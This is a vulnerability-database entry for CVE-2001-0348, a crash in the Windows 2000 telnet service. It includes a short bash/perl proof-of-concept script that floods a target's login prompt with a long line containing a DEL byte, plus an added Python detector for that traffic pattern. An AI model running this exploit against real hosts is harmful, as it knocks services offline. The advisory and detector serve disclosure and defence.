Microsoft Windows 2000 telnet service denial-of-service vulnerability

Vulnerability ID: 1106379    Vulnerability type: Unknown
Published: 2001-06-07    Updated: 2005-05-02
CVE ID: CVE-2001-0348    CNNVD-ID: CNNVD-200107-158
Platform: Windows    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/20907
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-158
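|Vulnerability details
A vulnerability exists in the Microsoft Windows 2000 telnet service. A local user can cause a denial of service (crash) via an overly long logon command that contains a backspace character.
|Exploit (EXP)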
source: http://www.securityfocus.com/bid/2838/info

Due to a flaw in the implementation of the telnet service, it is possible for a remote client to perform a denial of service attack against a host.

If approximately 4300 characters already exist in the input buffer and additional numerous specially chosen characters are provided, the service will stop responding. 

#!/bin/bash
  ( sleep 1
    perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'
    sleep 3
  ) | telnet victimbox
  - eof -
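
A detection-side view of the condition described above, as an added example that is not part of the advisory or the original script: it scans reassembled client-to-server Telnet bytes and reports any line where an erase character (DEL or backspace) arrives after an oversized, unterminated run of input. The 4000-byte threshold, the function names and the two sample streams are assumptions constructed for this illustration.

```python
# Added example (not from the advisory): flag Telnet client input where an
# erase character follows an oversized, unterminated line.
IAC, SB, SE = 0xFF, 0xFA, 0xF0
ERASE = {0x7F, 0x08}   # DEL (as in the page's script) and backspace
LINE_LIMIT = 4000      # assumption: alert just under the ~4300 bytes cited

def user_bytes(stream: bytes):
    """Yield client data bytes, skipping Telnet IAC negotiation sequences."""
    i, n = 0, len(stream)
    while i < n:
        b = stream[i]
        if b != IAC:
            yield b
            i += 1
        elif i + 1 >= n:
            return                           # capture ends inside a command
        elif stream[i + 1] == IAC:           # escaped literal 0xFF
            yield IAC
            i += 2
        elif stream[i + 1] == SB:            # subnegotiation runs to IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                return
            i = end + 2
        elif 0xFB <= stream[i + 1] <= 0xFE:  # WILL / WONT / DO / DONT + option
            i += 3
        else:
            i += 2                           # other two-byte command

def find_oversized_erase(stream: bytes, limit: int = LINE_LIMIT):
    """Return the pending byte count for each line in which an erase
    character arrives after more than `limit` unterminated bytes."""
    hits, pending, flagged = [], 0, False
    for b in user_bytes(stream):
        if b in (0x0D, 0x0A):                # CR or LF ends the line
            pending, flagged = 0, False
        elif b in ERASE:
            if pending > limit and not flagged:
                hits.append(pending)
                flagged = True
            pending = max(pending - 1, 0)    # an erase removes one pending byte
        else:
            pending += 1
    return hits

# Constructed samples: client-to-server bytes as reassembled from a capture.
BENIGN = b"\xff\xfd\x01" + b"administratoe\x08r\r\n"
SUSPECT = b"\xff\xfb\x18" + b"A" * 4500 + b"\x7f" + b"A" * 100 + b"\r\n"

if __name__ == "__main__":
    print(find_oversized_erase(BENIGN), find_oversized_erase(SUSPECT))
```

Ordinary logins that correct a typo with backspace stay well under the threshold and produce no hits; only the first erase character on an oversized line is reported, so one long line yields one alert.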
|References

Source: MS
Name: MS01-031
Link: http://www.microsoft.com/technet/security/bulletin/MS01-031.asp
Source: XF
Name: win2k-telnet-username-dos(6666)
Link: http://xforce.iss.net/static/6666.php
Source: CIAC
Name: L-092
Link: http://www.ciac.org/ciac/bulletins/l-092.shtml
Source: BINDVIEW
Name: 20010608 Range checking fault condition in Microsoft Windows 2000 Telnet server
Link: http://razor.bindview.com/publish/advisories/adv_mstelnet.html